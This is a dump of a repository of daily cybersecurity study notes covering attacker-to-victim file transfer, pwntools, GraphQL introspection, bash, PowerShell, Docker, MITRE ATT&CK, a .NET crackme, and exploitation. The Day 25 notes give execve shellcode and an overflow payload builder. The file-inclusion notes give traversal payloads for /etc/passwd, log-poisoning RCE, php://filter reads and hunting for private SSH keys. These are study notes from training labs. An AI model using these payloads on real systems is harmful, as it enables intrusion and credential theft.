FTP Transfer : 21 | 22 | So you can host a FTP server on the attacker machine and then connect to that from victim machine 23 | 24 | ```bash 25 | python -m pyftpdlib 21 #Host it like this 26 | 27 | ftp #Get it like this 28 | ``` 29 | 30 | ### WGET Transfer : 31 | 32 | ```bash 33 | wget link #Works on linux only though 34 | ``` 35 | 36 | ### Metasploit : 37 | 38 | If you have a meterpreter shell you can use the built functions on metasploit and upload and download stuff . 39 | 40 | ```bash 41 | upload filename # To upload filename to the target machine. 42 | download filename # To download filename from the target machine. 43 | ``` 44 | 45 | ### Netcat Transer Files : 46 | 47 | On the listening end where you wanna receive the file : 48 | 49 | ```bash 50 | nc -l -p 1234 > filefromtargertbrr 51 | ``` 52 | 53 | From where you wanna send the file : 54 | 55 | ```bash 56 | nc -w 3 1234 < filefromtargertbrr 57 | ``` 58 | 59 | ### Curl File Transfer : 60 | 61 | Host files using python3 from the attacker machine 62 | 63 | ```bash 64 | python3 -m http.server 80 65 | ``` 66 | 67 | To download them 68 | 69 | ```bash 70 | curl http://:/filefromattackerbrr -o fileoutput 71 | ``` 72 | 73 | ### SMB Server : 74 | 75 | To host stuff on a linux machine, 76 | 77 | ```bash 78 | sudo smbserver.py Share /folder/youwannashare 79 | ``` 80 | 81 | Get them on the Windows server like : 82 | 83 | ```powershell 84 | new view \\\\10.10.10.10 # Lists all the shares 85 | dir \\\\10.10.10.10\\Share # List files in the Share 86 | copy \\\\10.10.10.10\\Share # Copy Files from the Share 87 | ``` 88 | 89 | --- 90 | 91 | Linux 92 | 93 | ```powershell 94 | smbclient -L 10.10.10.10 #To list shares 95 | smbclient \\\\10.10.10.10\\Share # To connect to the share and then you can download stuff using get 96 | ``` 97 | 98 | ### Base64 file transfering : 99 | 100 | To turn a file into base 64 101 | 102 | ```bash 103 | cat exploit.py | base64 104 | ``` 105 | 106 | Turn a command or like a one liner into base64 107 | 108 | ```bash 109 | echo "Hello" | base64 110 | ``` 111 | 112 | Then turn this Text back to normal text and transfer it to a file in linux we can use : 113 | 114 | ```bash 115 | echo -n "SGVsbG8K" | base64 -d > file 116 | ``` -------------------------------------------------------------------------------- /Day 21 - Pwntools Usage Basics/README.md: -------------------------------------------------------------------------------- 1 | Main Resource Used : https://docs.pwntools.com/en/stable/globals.html 2 | This is to provide a basic idea and some basic commands to use in Pwntools 3 | 4 | To Download it : 5 | ```bash 6 | sudo pip install pwn 7 | ``` 8 | 9 | Most common way to use : 10 | ```python 11 | from pwn import * 12 | ``` 13 | 14 | Defining Context of the Binary : 15 | ```python 16 | context(os='linux', arch='amd64') 17 | ``` 18 | This field is to provide pwntools with context on what architecture, os , bit width etc. are ,this helps when you are lets say trying to generate shellcode, and also in cases you are doing ROP programming, etc. Its always recommened to have this field. A shortcut to set stuff automatically is also : 19 | ``` 20 | from pwn import * 21 | context.binary = "./your-vulnbinary) 22 | ``` 23 | Default values and all the values that you can edit and add can be found here : https://docs.pwntools.com/en/stable/context.html#pwnlib.context.ContextType.defaults 24 | 25 | Tubes : 26 | This is to talk to sockets, ssh connection and processes with pwntools : 27 | ``` 28 | # Remote sock connection 29 | remote = ("IP/Host", PORT) 30 | # Attaching Local Processes 31 | process = process('./binary') 32 | ``` 33 | 34 | ShellCraft : 35 | This is a module you can use to create shellcodes for binaries super easily in case NX is disabled 36 | ```python 37 | shellcode = asm(shellcraft.sh()) 38 | ``` 39 | You can also look at ways to play around with this shellcode generation here : 40 | 41 | Sending Inputs : 42 | Here > is what comes before asking for our input 43 | ``` 44 | io.sendlineafter('> ', 'whatyouwannasend') 45 | ``` 46 | 47 | p64 , u64 : 48 | 49 | p64 is to back an 64-Bit Integer/Addressand you can provide p64 with the following fields - number, endianness, sign 50 | ``` 51 | p64(stack_address) 52 | ``` 53 | u64 is to reverse this effect and unpack the 64bit integer from its packed from 54 | ``` 55 | u64(stack_address) 56 | ``` 57 | ROP Module : 58 | This tool can be used to build stacks preety trivially. ## More to be added here later ## -------------------------------------------------------------------------------- /Day 22 - GraphQL Basic Techniques/README.md: -------------------------------------------------------------------------------- 1 | Main Resource used : 2 | Tryhackme GraphQL Room : https://tryhackme.com/room/graphql 3 | Hacking GraphQL For Beginners from Farah Hawa : https://www.youtube.com/watch?v=OQCgmftU-Og 4 | 5 | 6 | GraphQL is a query language and way to interact with APIs just like REST. 7 | 8 | The main diffrence between this and REST API's are how you query and how they display those information. 9 | 10 | A normal Graphql query can look like this 11 | 12 | ```javascript 13 | { 14 | Cereal((name: "Lucky Charms")); 15 | { 16 | sugar; 17 | protein; 18 | } 19 | } 20 | ``` 21 | 22 | and this will give us output like so : 23 | 24 | ```javascript 25 | { 26 | "data" : { 27 | "Cereal" :{ 28 | "sugar" : "500mg"; 29 | "protein" : "0mg; 30 | } 31 | } 32 | } 33 | ``` 34 | 35 | ### How it works? 36 | 37 | Lets see how we can write these queries : 38 | 39 | This is kinda the basic tempalte of how they work 40 | 41 | ```javascript 42 | { 43 | { 44 | field, 45 | field, 46 | ... 47 | } 48 | } 49 | ``` 50 | 51 | Developers will set up schemas to use GraphQL and schema is bascially where we define what types are available to use and in schema Query is the root type , anything here is allowed to be searchable and in this Query type we can set up arguements and stuff we can take to use to search this query like lets say id or name of a product. 52 | 53 | Then second field is the type where we define all the fields and that can return data in our response. 54 | 55 | Main benefit of graphql is flexibility we can get as much and as little data as we want. 56 | 57 | Then the way the functions can return the data is written. 58 | Then we have the root variable which tells which function to use when dealing with which object. 59 | 60 | Graphql luckily for us documents itself preety well, it comes with certain objects, types and fields that allow us to get information on all the other types. 61 | 62 | So basically we can gain a lot of information without even fuzzing endpoints or anything. 63 | 64 | All the types defined in schema method are documented through the `__schema object` . So we can get all info about types from here. And then to know about types we can use the field `types`, then we can search with the fields we want. 65 | 66 | Then we can use \_type to build objects and use some param to specify which type we want more information on. 67 | 68 | 69 | To get schemas and information about a Graphql api we can use : 70 | ```javascript 71 | query Introspection{ 72 | __schema{ 73 | types{ 74 | name 75 | description 76 | } 77 | } 78 | } 79 | ``` 80 | 81 | and a great extension to inspect and edit these GraphQL queries in Burp suite is InQL 82 | -------------------------------------------------------------------------------- /Day 23 - Linux Command Line and Bash/README.md: -------------------------------------------------------------------------------- 1 | Resources Used : https://tryhackme.com/room/linuxmodules 2 | 3 | # Basic Syntax : 4 | 5 | Declaring Variables: 6 | 7 | ```bash 8 | #!/usr/bin/env bash 9 | 10 | NAME="John" 11 | echo "Hello $NAME!" 12 | echo $NAME 13 | echo "$NAME" 14 | echo "${NAME}!" 15 | ``` 16 | 17 | Functions : 18 | 19 | ```bash 20 | # One Way 21 | myfunc() { 22 | echo "hello $1" 23 | } 24 | # Second Way 25 | function myfunc() { 26 | echo "hello $1" 27 | } 28 | # Calling it 29 | 30 | myfunc "John" 31 | ``` 32 | 33 | ```bash 34 | # Declaring local variables in Functions 35 | myfunc() { 36 | local myresult='some value' 37 | echo $myresult 38 | } 39 | ``` 40 | 41 | Raise Errors : 42 | 43 | ```bash 44 | myfunc() { 45 | return 1 46 | } 47 | if myfunc; then 48 | echo "success" 49 | else 50 | echo "failure" 51 | fi 52 | ``` 53 | 54 | Defining Arrays : 55 | 56 | ```bash 57 | Fruits=('Apple' 'Banana' 'Orange') 58 | 59 | Fruits[0]="Apple" 60 | Fruits[1]="Banana" 61 | Fruits[2]="Orange" 62 | ``` 63 | 64 | Operations on these Arrays : 65 | 66 | ```bash 67 | Fruits=("${Fruits[@]}" "Watermelon") # Push 68 | Fruits+=('Watermelon') # Also Push 69 | Fruits=( ${Fruits[@]/Ap*/} ) # Remove by regex match 70 | unset Fruits[2] # Remove one item 71 | Fruits=("${Fruits[@]}") # Duplicate 72 | Fruits=("${Fruits[@]}" "${Veggies[@]}") # Concatenate 73 | lines=(`cat "logfile"`) # Read from file 74 | echo ${Fruits[0]} # Element #0 75 | echo ${Fruits[-1]} # Last element 76 | echo ${Fruits[@]} # All elements, space-separated 77 | echo ${#Fruits[@]} # Number of elements 78 | echo ${#Fruits} # String length of the 1st element 79 | echo ${#Fruits[3]} # String length of the Nth element 80 | echo ${Fruits[@]:3:2} # Range (from position 3, length 2) 81 | echo ${!Fruits[@]} # Keys of all elements, space-separated 82 | ``` 83 | 84 | Iteration over an Array : 85 | 86 | ```bash 87 | for i in "${arrayName[@]}"; do 88 | echo $i 89 | done 90 | ``` 91 | 92 | If loops : 93 | 94 | ```bash 95 | # Basic Loop 96 | for i in /etc/rc.*; do 97 | echo $i 98 | done 99 | # Loop like C 100 | for ((i = 0 ; i < 100 ; i++)); do 101 | echo $i 102 | done 103 | # With Ranges 104 | for i in {1..5}; do 105 | echo "Welcome $i" 106 | done 107 | ``` 108 | 109 | Passing Positional Arguments : 110 | 111 | ```bash 112 | #!/bin/bash 113 | 114 | # 2 get positional arguements we can use $1 like so 115 | # Also string concatenation works mostly with " " 116 | echo "Hello there! $1" 117 | ``` 118 | 119 | Setting Default Values : 120 | 121 | ```bash 122 | #!/bin/bash 123 | 124 | name=${1:-"Something"} 125 | echo "My name is $name." 126 | ``` 127 | 128 | This will set the default value of name as something if there isn't an argument passed with the script. 129 | 130 | To pop up a error if the $1 argument is not passed we can do this : 131 | 132 | ```bash 133 | #!/bin/bash 134 | 135 | name=${1:?"Yo asked your name mahn?"} 136 | echo "My name is $name." 137 | ``` 138 | 139 | Pass errors if more arguments then needed are passed : 140 | 141 | ```bash 142 | if [ $# -ne 1 ]; then 143 | echo "Usage: Hello Hello Hello" 144 | exit 1 145 | fi 146 | echo "We good Homie, $1" 147 | exit 1 148 | ``` 149 | 150 | ### Some tools that help make life a little better for us 151 | 152 | du : This command helps us see the disk usage , and shows which dir uses how much space. Size is shown in kb. Normally if run without any flags like so : 153 | 154 | ```bash 155 | du # Shows disk usage of all directories in the current dir 156 | du -a # Shows disk usage of files as well as directories 157 | du -h # Lists file sizes in KB,GB,MB,B 158 | du -d No.ofDepth # To specify the depth 159 | ``` 160 | 161 | grep : This is used to filter search a file for a certain pattern in them and displays the line where that pattern is found/matched. 162 | 163 | Basic Syntax goes something like this : 164 | 165 | ```bash 166 | grep "PATTERN" file.txt 167 | ``` 168 | 169 | The patterns could be of two type : 170 | 171 | 1. Find stuff using a regex 172 | 173 | ```bash 174 | grep -E "regex" file.txt 175 | # or we can use egrep 176 | egrep "regex" file.txt 177 | # Example : 178 | grep -E "([1-9])\w+" grep.txt # would match numbers 1-9 and any words after it 179 | ``` 180 | 181 | 2. Find stuff using a fixed string inside the text : 182 | 183 | ```bash 184 | grep -F "Plus Ultra" file.txt # Use it to match a sentence that contains Plus Ultra 185 | # or we can use fgrep 186 | fgrep "string" file.txt 187 | ``` 188 | 189 | You can then use flags like : 190 | -R : recursive grep on the files inside the folders, by default its not recursive. 191 | -h : Hides the file names if you are doing recursive sarching 192 | -i : ignores the case of the value (Doesnt care if its lowercase or uppercase ) 193 | 194 | You can use `man grep` to get a manual for grep and for more stuff it can be used for 195 | 196 | Also to make/use/test you can see this website : https://regexr.com/ 197 | 198 | tr : This is translate command, it can help us in a lot of String Operators, like Changing character cases in a string to replace characters in a string. 199 | 200 | Syntax : 201 | 202 | ``` 203 | tr [flag] [source]/[find]/[select] [destination]/[replace]/[change] 204 | ``` 205 | 206 | Some of the flags are : 207 | -d : Delete a given set of characters 208 | -t : concat source set with a destination set 209 | -s : replace the source set with the destination set 210 | -c : This is a reverse so basically you filter will apply on the thing that doesnt match the filter 211 | 212 | Examples : 213 | 214 | ```bash 215 | cat file.txt | tr -d '[a-cA-C= ]' # If you use this in tr.txt from test file it should print youdidit 216 | # Should turn all the content of newtr.txt to lowercase 217 | cat newtr.txt| tr -s '[:upper:]' '[:lower:]' 218 | ``` 219 | 220 | AWK : This is an all in one tool and is basically a sctipting languaged used to manipulate data and generating reports. 221 | 222 | Syntax : `awk [flags] [select patter/find(sort)/commands] [input file]` 223 | P.S : You can also pipe output 224 | 225 | you can also write a script and pass it like so : 226 | 227 | ```bash 228 | awk -f script.awk file.txt 229 | ``` 230 | 231 | Now lets get to the basic usage of this tool : 232 | 233 | ```bash 234 | awk '{print}' file.txt # To Print the text as it is 235 | awk '/pattern/' file.txt # The pattern here is enclosed inside the / / and then its matched against file.txt 236 | ``` 237 | 238 | uniq : This filters the output and removes any duplicates, so we get all the unique stuff. 239 | 240 | ```bash 241 | cat uniq.txt | uniq 242 | ``` 243 | 244 | sort : This basically sorts the lines alphabetically and numeracally. 245 | 246 | ```bash 247 | cat sort.txt | sort 248 | ``` 249 | -------------------------------------------------------------------------------- /Day 23 - Linux Command Line and Bash/testfiles/awk.txt: -------------------------------------------------------------------------------- 1 | Yo Best Friendo 2 | Nice Pitch 3 | Yo mahn 4 | Hello there 5 | 6 | -------------------------------------------------------------------------------- /Day 23 - Linux Command Line and Bash/testfiles/grep.txt: -------------------------------------------------------------------------------- 1 | Plus Ultra 2 | 12324 hello 3 | yo yo yo yo yo 4 | -------------------------------------------------------------------------------- /Day 23 - Linux Command Line and Bash/testfiles/newtr.txt: -------------------------------------------------------------------------------- 1 | Youdidit 2 | -------------------------------------------------------------------------------- /Day 23 - Linux Command Line and Bash/testfiles/sort.txt: -------------------------------------------------------------------------------- 1 | Alohaoy 2 | 222 jojo 3 | Jojo 4 | Majima 5 | Goro 6 | 7 7 | Kiryu 8 | Kazuma 9 | -------------------------------------------------------------------------------- /Day 23 - Linux Command Line and Bash/testfiles/tr.txt: -------------------------------------------------------------------------------- 1 | Yo=====u dAAAAiACCCCdBBBiaaaaaaaaAAAABBBCCCCAAAAt 2 | -------------------------------------------------------------------------------- /Day 23 - Linux Command Line and Bash/testfiles/uniq.txt: -------------------------------------------------------------------------------- 1 | Hello 2 | Hello 3 | Hello 4 | Shalom 5 | Labas 6 | Yo 7 | -------------------------------------------------------------------------------- /Day 24 - Powershell Basics/README.md: -------------------------------------------------------------------------------- 1 | Resources to learn from : https://docs.microsoft.com/en-us/learn/modules/introduction-to-powershell/ 2 | 3 | Powershell is : 4 | 5 | 1. Cmdline-Shell 6 | 2. Scripting Language 7 | 3. Designed to be a task engine 8 | 4. Framework to automate tasks in Windows and now even cross platform. 9 | 10 | It Provides acesses to almost everything in Windows Platform and AD enviornment. 11 | 12 | Features : 13 | 14 | 1. Has built in help system, You can see which commands it supports, and its capabilities. 15 | 2. Pipeline functioniality to allow running many commands sequentially,so basically output of the previous command is the input for the next one. 16 | 3. Aliases are basically shortcutes/alternate names which you can set/map to certain commands. 17 | 18 | 4. It operates on objects so you spend less time formating and extracting stufff. 19 | 5. Cmdlets are Commands in powershell and are built on a common runtime rather than seperate executables. To provide a consitent behaviour. 20 | 21 | 6. Has many types of commandss in Powershell which can be native executables, cmdlets, functions, scripts or aliases. 22 | -------------------------------------------------------------------------------- /Day 25 - x64 Linux Binary Exploitation (1)/README.md: -------------------------------------------------------------------------------- 1 | Resources used : https://www.youtube.com/watch?v=gxU3e7GbC-M : x64 Linux Binary Exploitation Training : Souce Meets Sink | https://www.theoffensivelabs.com/p/x64-linux-binary-exploitation-live-training 2 | 3 | So lets start with our basic BufferOverflow, I am using the code the course provided us with : 4 | ```c 5 | #include 6 | #include 7 | void vuln_func(char *input); 8 | 9 | int main(int argc, char *argv[]){ 10 | if(argc>1) 11 | vuln_func(argv[1]); 12 | } 13 | 14 | void vuln_func(char *input){ 15 | char buffer[256]; 16 | strcpy(buffer, input); 17 | } 18 | ``` 19 | (This code was taken from the course, and is not written by me) 20 | 21 | and then we can use gdb to compile the code for us without any protections. For most of our exploit development core files are very important as they have all the infromation about the dump for us and this is generated automatically when we get a segfault. If it doesnt generate automatically we can use : 22 | 23 | ```bash 24 | ulimit -c unilimited 25 | ``` 26 | 27 | and then from this core file we can analyse whatever happened in the crash and we can analyse these core files using gdb like this : 28 | ```bash 29 | gdb -core core 30 | ``` 31 | 32 | With 64bit we wont be by default see 4141414141 on RIP due to a concept called canonical bytes so with these exploits we usually overwrite the RBP and if thats overwritten thats all we need as out of the box. 33 | 34 | We can load up binaries in GDB like so : 35 | 36 | ``` 37 | gdb ./binary 38 | ``` 39 | Ideally you would also wanna do checksec on the binary but as we compiled it we know its alright and has no security enabled. 40 | 41 | and then if we have a paylaod file with us we can use/pass our payload to it like this : 42 | 43 | ``` 44 | run $(cat payloadfile) 45 | ``` 46 | 47 | and ideally its a good Idea to also put a breakpoint at main to analyse the registers. 48 | We can dissasmble and see assembly code of a function using the command `disas main` or `disas func` 49 | 50 | Also break points are put using `b *address` and then you can continue `c`. 51 | 52 | So we wont be able to overwrite the RIP as if you see the vmap of the binary we will see that out of the 64 bit only 48bits are used which is called canonical addressing so when you address a memory you can only use 48bit addresses but when we are overwriting it we are passing it a 8 byte (64 bits) addressing (non canonical) and the RIP wont accept it and these addresses are only used by the kernel and to pass a canonical byte to the RIP we need to get the offset of RBP and then using that information to overwrite the RIP with 6 bytes in the non-cononical addressing. 53 | 54 | To get this offset we can use pattern_create which is a module in gdb-peda which is what i am using 55 | 56 | ```bash 57 | gdb-peda> pattern_create 400 payload.txt 58 | gdb-peda> run $(cat payload.txt) 59 | ``` 60 | after doing this with enough of a payload to crash a segfault and overwriting the RBP we can copy the value in RBP and use pattern_offset 61 | ```bash 62 | gdb-peda> pattern_offset "RBPText" 63 | ``` 64 | and it will give us the exact offset to overwrite the RBP, now we can overwrite the RBP using the offset and supplying input for the RBP where we can use non-canonical addressing bytes(8 bytes) and then pass a canonical address (6 bytes) to overwrite the RIP with the 6bytes we passed like so : 65 | 66 | ```python 67 | 68 | # Assuming offset is 128 69 | padding = "A" * 128 70 | rbpvalue = "B" * 8 # noncanonical addressing 71 | ripvalue = "C" * 6 # canonical addressing 72 | ``` 73 | 74 | ret does pop rip which pops the value on the top of the stack to RIP. Here is some shellcode from the course that we can use : 75 | ```bash 76 | \x48\x31\xc0\x48\x89\xc2\x48\x89\xd6\xd50\x48\xbb\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x53\x48\x89\xe7\x48\x83\xc0\x3b\x0f\x05 77 | ``` 78 | 79 | Now we can use the shellcode and modify the pading and use some payloads to exploit this. 80 | 81 | ```python 82 | offset = 128 83 | shellcode = "\x48\x31\xc0\x48\x89\xc2\x48\x89\xd6\xd50\x48\xbb\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x53\x48\x89\xe7\x48\x83\xc0\x3b\x0f\x05" 84 | 85 | nop = "\x90" * 12 86 | 87 | offset = offset - len(shellcode) - len(nop) 88 | padding = "A" * offset 89 | rbpvalue = "B" * 8 # noncanonical addressing 90 | ripvalue = "C" * 6 # canonical addressing 91 | payload = nop + shellcode + padding + rbpvalue + ripvalue 92 | ``` 93 | 94 | Now we need to find the address where our payload is stored using gdb and the x/50gx function and printing the stuff near $rsp and subtracting a little bit of padding we sent from it like this : 95 | ```bash 96 | x/50gx $rsp-140 97 | ``` 98 | but sometimes we wont get the exact same address in gdb that we will get while execute thats when we can use the core file and see where the address is and modify our exploit and then gg. 99 | 100 | If the function is using a more vulnerable function like gets we can use instructions like JMP RSP , JMP RBX and point in our RIP and in the case JMP RSP we would need to have our shellcode right after the RIP as JMP RSP will jump to the top of the stack and our code whcih is directely after that will pop on to the top of the stack. 101 | 102 | JMP RBX on the other hand would work only whethere shell code is in RBX and then we can use a fellow JMP RBX command and jump to that. 103 | -------------------------------------------------------------------------------- /Day 26 - .NET Executing Reversing/Images/flag.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nickapic/Cyber-Security-Knowledge/91f78514d5b122e769244bad2235808054b70acf/Day 26 - .NET Executing Reversing/Images/flag.png -------------------------------------------------------------------------------- /Day 26 - .NET Executing Reversing/Images/importing.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nickapic/Cyber-Security-Knowledge/91f78514d5b122e769244bad2235808054b70acf/Day 26 - .NET Executing Reversing/Images/importing.png -------------------------------------------------------------------------------- /Day 26 - .NET Executing Reversing/Images/main1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nickapic/Cyber-Security-Knowledge/91f78514d5b122e769244bad2235808054b70acf/Day 26 - .NET Executing Reversing/Images/main1.png -------------------------------------------------------------------------------- /Day 26 - .NET Executing Reversing/Images/main2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nickapic/Cyber-Security-Knowledge/91f78514d5b122e769244bad2235808054b70acf/Day 26 - .NET Executing Reversing/Images/main2.png -------------------------------------------------------------------------------- /Day 26 - .NET Executing Reversing/Images/online.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nickapic/Cyber-Security-Knowledge/91f78514d5b122e769244bad2235808054b70acf/Day 26 - .NET Executing Reversing/Images/online.png -------------------------------------------------------------------------------- /Day 26 - .NET Executing Reversing/README.md: -------------------------------------------------------------------------------- 1 | This is a fairly basic reversing challenge which deals with basic C# Reversing and decompiling binaries written in C#. 2 | 3 | For this we can use tools like DNSpy which can be downloaded from here : [](https://github.com/dnSpy/dnSpy/releases/tag/v6.1.8)[https://github.com/dnSpy/dnSpy/releases/tag/v6.1.8](https://github.com/dnSpy/dnSpy/releases/tag/v6.1.8) and then download the version for your OS and unzip it and thats it. 4 | 5 | Now lets load binary in dnSpy using the File option and selecting the EXE. Here we see there are three functions when the binary loads up : 6 | 7 | ![error](./Images/importing.png) 8 | 9 | and we will be most intrested in the main function at first and analysing whats that function doing 10 | 11 | ![woah error](./Images/main1.png) 12 | ![woah error](./Images/main2.png) 13 | 14 | and here we can see that there is a if/else statement and a try/catch if that if statement matches and when we analyse the it seems its gonna ask for a input of sorts and that input is called num and the if statement is if ((num ^ num2) == num3) then we have to somehow find out what world be the input to match this if statement. 15 | 16 | Here it says : num3 = num ^ num2 so num = num2 ^ num3 and we have the values for num2 and num3 so lets use an online compiler to find this value here is the code : 17 | 18 | ```csharp 19 | using System; 20 | 21 | public class Program 22 | { 23 | public static void Main() 24 | { 25 | long num2 = 53129566096L; 26 | long num3 = 65535655351L; 27 | long result = num2 ^ num3 ; 28 | Console.WriteLine(result); 29 | } 30 | } 31 | ``` 32 | 33 | This is the online compiler i used : [](https://dotnetfiddle.net/)[https://dotnetfiddle.net/](https://dotnetfiddle.net/) 34 | 35 | ![error](./Images/online.png) 36 | 37 | Here we can now just run the program and use this number and get the flag easy peasy. 38 | 39 | P.S. decompyling and modyifying the C# program's if statement to avoid the condition wont work here as its gonna give us a error in Catch statement as we need the num value to decode the string which has the flag. 40 | 41 | ![error](./Images/flag.png) 42 | 43 | We can also use breakpoints in dnSpy to see the variables at a certain point and just locally set variables that way soemetimes. -------------------------------------------------------------------------------- /Day 27 - Docker/README.md: -------------------------------------------------------------------------------- 1 | Resources used : 2 | 1. https://madhuakula.com/content/introduction-to-docker-containers/#/4 3 | 2. https://www.youtube.com/watch?v=gAkwW2tuIqE : Learn Docker in 7 Easy Steps : Fireship 4 | 5 | Docker is a container based virtualization approach where we use the kernel on the host's OS to run multiple guest instances whcih are called containers. 6 | 7 | Each container has : Root File System, Process, Memory, Devices, Network ports. 8 | 9 | Containers help us wrap a piece of software in a complete filesytstem that contains everything we need to be installed and run the application as we would like it to for everyone and hence not have a "It ran good on my computer" situation and it runs on every system. 10 | 11 | Main Tools: 12 | 1. Image : Read only with OS. libraries and apps, Its the blueprint of the containers and what containers are built from. 13 | 2. Container : Statefull instances of image with a writeable layer basically think of it as a house built with the image used as its blueprint. 14 | 3. Docker Registry : This a repository of images like Github is for code for example and one fo the major public docker registry is Docker Hub (https://hub.docker.com/) 15 | 4. Dockefile : These are the steps that are taken by Docker to create the Blueprint(Image). So basically you are drawing out the blueprint using this Dockerfile. 16 | 17 | Main tool/products in Docker; 18 | 19 | Docker Engine : Core functions to Docker image4s to create and start Docker Container. 20 | Docker Machine : Automated Contrianer Provisioning 21 | Docker Swarn : Allows Container clustering and scheduling 22 | Docker Compose : Allows to define muli-container enviornments and operate them. 23 | 24 | 25 | Then some basic commands to use in Docker : 26 | 27 | To Build : 28 | 1. To build a image using the Dockerfile in the current directory with a tag and version number 1.0 : 29 | 30 | `docker build -t imagename:1.0` 31 | 32 | 2. List all the images that are locally stored with Docker Engine : 33 | `docker images ls` 34 | 35 | 3. Delete an image from the local image store : 36 | `docker image rm alpine:3.4` 37 | 38 | To Run : 39 | 1. To show all running containers : `docker container ls` 40 | 2. Run a container with an image and name, then expose port 500 externally mapped to a port 80 inside the container : `docker container run --name web -p 3000:80 image:1.0` 41 | 3. List the networks : `docker network ls` 42 | 4. Stop a running container through SIGTERM : `docker container stop containername` -------------------------------------------------------------------------------- /Day 28 - Mitre/Attack.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nickapic/Cyber-Security-Knowledge/91f78514d5b122e769244bad2235808054b70acf/Day 28 - Mitre/Attack.png -------------------------------------------------------------------------------- /Day 28 - Mitre/README.md: -------------------------------------------------------------------------------- 1 | ``` 2 | Resource Used : https://tryhackme.com/room/mitre 3 | ``` 4 | 5 | 6 | ### Basic Terminology: 7 | 8 | APT : Advanced Persistent Threat which can be a team/group or even nation state group that engages in long-term attack against organization/countries. 9 | 10 | TTP : Techniques, Tactics and Procedure : 11 | Tactic : Goal or Objective 12 | Technique : How they achieve the goal 13 | Procedure : How the technique is executed. 14 | 15 | ### Attack Framework: 16 | 17 | This is a globally accesible knowledge base of advesary TTs based on real life observations executed by APTs. Its a resource that a lot of people in the industry contribute to and maintain : 18 | 19 | ![](./Attack.png) 20 | 21 | Here there are 14 main categories , which contain the techniques (which then contain subcategories sometimes if needed) which the adversary could use to perform the tatic. If we want to get more information we can just click on the topic which will give us a brief description, Proceure examples and mitigations. 22 | 23 | -------------------------------------------------------------------------------- /Day 29 - File Inclusion/Pasted image 20211011233528.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nickapic/Cyber-Security-Knowledge/91f78514d5b122e769244bad2235808054b70acf/Day 29 - File Inclusion/Pasted image 20211011233528.png -------------------------------------------------------------------------------- /Day 29 - File Inclusion/Pasted image 20211011233544.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nickapic/Cyber-Security-Knowledge/91f78514d5b122e769244bad2235808054b70acf/Day 29 - File Inclusion/Pasted image 20211011233544.png -------------------------------------------------------------------------------- /Day 29 - File Inclusion/README.md: -------------------------------------------------------------------------------- 1 | ``` 2 | Resource Used : https://tryhackme.com/room/fileinc 3 | ``` 4 | Local File inclusion (LFI), or simply File Inclusion, refers to an inclusion attack through which an attacker can trick the web application into including files on the web server by exploiting a functionality that dynamically includes local files or scripts. The consequences of a successful LFI attack include Directory Traversal and Information Disclosure as well as Remote Code Execution. 5 | 6 | Typically, Local File Inclusion (LFI) occurs, when an application gets the path to the file that has to be included as an input without treating it as untrusted input. This would allow a local file to be supplied to the included statement.Local File Inclusion is very much like Remote File Inclusion (RFI), with the difference that with Local File Inclusion, an attacker can only include local files (not remote files like in the case of RFI). 7 | 8 | You can do ?page=home.html 9 | 10 | ### Directory Traversal 11 | 12 | A path traversal attack (also known as directory traversal) aims to access files and directories that are stored outside the web root folder. By manipulating variables that reference files with “dot-dot-slash (../)” sequences and its variations or by using absolute file paths, it may be possible to access arbitrary files and directories stored on file system including application source code or configuration and critical system files. It should be noted that access to files is limited by system operational access control (such as in the case of locked or in-use files on the Microsoft Windows operating system). 13 | 14 | This attack is also known as “dot-dot-slash”, “directory traversal”, “directory climbing” and “backtracking”. 15 | 16 | ?page=../creditcard 17 | 18 | You can do ?page=../../../etc/passwd or something like that 19 | 20 | ### Log Poinsoning 21 | 22 | **In order for that to happen, the directory should have read and execute permissions.** 23 | 24 | Applications typically use log files to store a history of events or transactions for later review, statistics gathering, or debugging. Depending on the nature of the application, the task of reviewing log files may be performed manually on an as-needed basis or automated with a tool that automatically culls logs for important events or trending information. 25 | 26 | Writing invalidated user input to log files can allow an attacker to forge log entries or inject malicious content into the logs. This is called log injection. 27 | 28 | Log injection vulnerabilities occur when: 29 | 30 | 1. Data enters an application from an untrusted source. 31 | 2. The data is written to an application or system log file. 32 | 33 | Successful log injection attacks can cause: 34 | 35 | 1. Injection of new/bogus log events (log forging via log injection) 36 | 2. Injection of XSS attacks, hoping that the malicious log event isviewed in a vulnerable web application 37 | 3. Injection of commands that parsers (like PHP parsers) could execute 38 | 39 | In order for that to happen, the directory should have read and execute permissions. 40 | 41 | To read logs try this one →../../../../../var/log/apache2/access.log 42 | 43 | RFI is remote file inclusions in this case what the user is able to do is basically plant any external resource in the ?extension thing here but . And this way we can include shells or something to get RCE. 44 | 45 | We can host our shell using a python server and then use that resource to execute what ever code we have specified by it but remember the file extensions in this if using php or something should be .txt in the rfi param as if its php it will be interpreted in our machine instead of our target. 46 | 47 | Another uploading file uploading vulnerability could be unrestriced file uploading so like the file lets us upload .php, .aspx files or soemthing and get rev shell via it by traverssing the uploads. 48 | 49 | This can be excuted if 2 conditions are met though : file cleaning sanitizing is not done and any extension is allowed and if the uploads directory is guessable or know to the users 50 | 51 | To turn LFI to Log Poising and RCE we can do the following : 52 | 53 | We will first need to pass a php snippet in the User-Agent field like so when we intercept a request to the php file thats vulnerable to the LFI 54 | 55 | ![[Pasted image 20211011233528.png]] 56 | 57 | and then we can use 58 | 59 | ```bash 60 | /.././.././../log/apache2/access.log&cmd=id 61 | ``` 62 | 63 | To run the command and to see the output of this just scroll down to the bottom of the logs and you will see the command reflected. 64 | 65 | ![[Pasted image 20211011233544.png]] 66 | 67 | ### Base64 Filtering for LFI 68 | 69 | For getting files using Base64 filtering LFI attacks we can use this command: 70 | 71 | ```bash 72 | ?vulnparam=php://filter/convert.base64-encode/resource=index 73 | ``` 74 | 75 | ### Use LFI Wordlist to get endpoints 76 | 77 | If we have LFI and we dont know what to paths to go for my standards are to do /etc/passwd see the username and then try look for stuff like `.ssh/id_rsa` for that user and stuff like that so we can try bruteforcing the directories a good list we can use to bruteforce : 78 | 79 | 